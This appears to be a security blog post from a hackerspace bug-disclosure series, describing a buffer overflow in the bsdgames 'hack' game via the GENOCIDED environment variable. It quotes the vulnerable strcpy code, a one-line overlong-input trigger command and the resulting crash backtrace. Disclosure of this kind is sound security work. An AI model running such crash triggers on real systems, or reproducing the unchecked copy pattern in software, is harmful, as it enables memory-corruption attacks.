InfoSect's Month of Pointless Bugs (#9)

Dr Silvio Cesare

InfoSect, Canberra's hackerspace, regularly runs public group sessions to perform code review and vulnerability discovery. Over the next 30 days, I'll highlight the source code of 30 unknown vulnerabilities.

Bug #9

in bsdgames/hack there is a standard buffer overflow with GENOCIDED environment variable. Alas, you have to be root/superuser, so it's not really much of a problem.

bsdgames/hack/hack.main.c #ifdef WIZARD if (!wizard) { #endif /* * check for multiple games under the same name * (if !locknum) or check max nr of players (otherwise) */ (void) signal(SIGQUIT, SIG_IGN); (void) signal(SIGINT, SIG_IGN); if (!locknum) (void) strcpy(lock, plname); getlock(); /* sets lock if locknum != 0 */ #ifdef WIZARD } else { char *sfoo; (void) strcpy(lock, plname); if ((sfoo = getenv("MAGIC")) != NULL) while (*sfoo) { switch (*sfoo++) { case 'n': (void) srandom(*sfoo++); break; } } } if ((sfoo = getenv("GENOCIDED")) != NULL) { if (*sfoo == '!') { const struct permonst *pm = mons; char *gp = genocided; while (pm < mons + CMNUM + 2) { if (!strchr(sfoo, pm->mlet)) *gp++ = pm->mlet; pm++; } *gp = 0; } else (void) strcpy(genocided, sfoo); (void) strcpy(fut_geno, genocided); +++ buffer overflow } }

To trigger:

root@kali:~# export GENOCIDED=$(perl -e 'print "x" x 1000'); /usr/games/hack -D *** buffer overflow detected ***: /usr/games/hack terminated ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x70bfb)[0x7fc8e8ca2bfb] /lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7fc8e8d2b1e7] /lib/x86_64-linux-gnu/libc.so.6(+0xf7320)[0x7fc8e8d29320] /lib/x86_64-linux-gnu/libc.so.6(+0xf6682)[0x7fc8e8d28682] /usr/games/hack(+0x7337)[0x5588ca7ee337] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7fc8e8c522e1] /usr/games/hack(+0x74fa)[0x5588ca7ee4fa] ======= Memory map: ======== 5588ca7e7000-5588ca829000 r-xp 00000000 08:01 5395189 /usr/games/hack 5588caa29000-5588caa2b000 r--p 00042000 08:01 5395189 /usr/games/hack